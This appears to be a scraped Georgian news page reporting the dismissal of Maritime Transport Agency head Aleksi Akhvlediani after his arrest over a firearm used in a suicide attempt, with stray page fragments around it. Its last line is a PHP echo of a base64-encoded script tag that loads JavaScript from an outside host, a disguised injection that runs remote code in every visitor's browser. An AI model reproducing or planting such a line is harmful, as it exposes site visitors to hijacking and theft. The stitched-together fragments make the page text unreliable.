global distribution
გარე ავეჯი

ეკონომიკისა და მდგრადი განვითარების სამინისტროს საზღვაო ტრანსპორტის სააგენტოს ხელმძღვანელს ალექსი ახვლედიანს უფლებამოსილება შეუწყდა - შესაბამის ბრძანებას ხელი დღეს, 9 ივლისს მოეწერა. აღნიშნულ ინფორმაციას ეკონომიკის სამინისტრო ავრცელებს.

ალექსი ახვლედიანი საზღვაო ტრანსპორტის სააგენტოს დირექტორად 2023 წლის მაისიდან მუშაობდა.

შეგახსენებთ, ალექსი ახვლედიანი ცეცხლსასროლი იარაღის დაუდევრად შენახვის ბრალდებით დააკავეს. საქმე ეხება 7 ივლისს საგარეჯოში მომხდარ შემთხვევას, რა დროსაც, პროკურატურის ინფორმაციით, აჭარის ავტონომიური რესპუბლიკის მთავრობის ყოფილმა ხელმძღვანელმა თორნიკე რიჟვაძემ ახვლედიანის სახლში, ახვლედიანის კუთვნილი იარაღით თვითმკვლელობა სცადა.

თბილისის საქალაქო სასამართლომ ალექსი ახვლედიანს 30 000-ლარიანი გირაო შეუფარდა და სასამართლო სხდომათა დარბაზიდან გაათავისუფლა.ა

187
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");